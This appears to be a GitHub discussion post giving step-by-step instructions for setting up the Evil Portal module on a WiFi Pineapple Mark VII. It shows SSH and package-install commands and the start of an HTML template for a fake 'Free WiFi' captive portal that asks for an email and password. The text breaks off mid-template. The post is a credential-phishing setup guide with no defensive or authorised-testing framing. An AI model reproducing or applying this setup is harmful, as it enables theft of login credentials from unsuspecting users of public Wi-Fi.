Skip to content
Discussion options

You must be logged in to vote

Setting Up Evil Portal on WiFi Pineapple Mark VII

Prerequisites

  • WiFi Pineapple Mark VII with latest firmware
  • Connected to management network (USB-C or WiFi)

Step 1: Install Evil Portal

ssh root@172.16.42.1
opkg update
opkg install evil-portal

Or: Web UI > Modules > Get Modules > Evil Portal > Install

Step 2: Create Your Portal

mkdir -p /root/portals/myportal

Create: index.php (landing page), MyPortal.php (backend handler), default.css (styling)

Step 3: Basic Template

<!DOCTYPE html>
<html>
<head><title>Free WiFi</title></head>
<body>
<form method="POST" action="/captiveportal/index.php">
  <input name="email" placeholder="Email" required>
  <input name="password" type="password" placeho…

Replies: 1 comment

Comment options

You must be logged in to vote
0 replies
Answer selected by bad-antics
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Category
Q&A
Labels
None yet
1 participant